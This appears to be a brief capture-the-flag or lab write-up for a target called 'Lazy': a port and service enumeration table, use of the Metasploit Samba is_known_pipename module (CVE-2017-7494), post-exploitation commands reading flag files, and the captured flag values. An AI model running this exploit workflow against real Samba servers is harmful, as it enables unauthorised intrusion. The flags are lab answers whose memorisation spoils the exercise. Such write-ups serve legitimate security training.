Info
- Name – Lazy
- IP Address – 172.31.1.1
Enumeration
Open Ports
Port | Protocol | Service | Version |
22 | tcp | ssh | OpenSSH 5.9p1 Debian 5ubuntu1.10 |
68 | udp | filtered | dhcpc |
80 | tcp | http | nginx 1.1.19 |
137 | udp | filtered | netbios-ns |
138 | udp | filtered | netbios-dgm |
139 | tcp | netbios-ssn | Samba smbd 3.X – 4.X |
445 | tcp | netbios-ssn | Samba smbd 3.6.25 |
49152 | udp | filtered | unknown |
Exploitation
Exploit Details (Metasploit)
- Name – Samba is_known_pipename() Arbitrary Module Load
- CVE – 2017-7494
- Module – exploit/linux/samba/is_known_pipename
- Disclosed – 2017-03-24
- References
Show metasploit options
show options
Run exploit Commands
run
whoami
cat /home/adam/access.txt
cat /root/system.txt
Loot
access.txt - 899661bdf5057dabf7c652dd75f00fb8
system.txt - 17307fd709f556f59e2c698b7495476c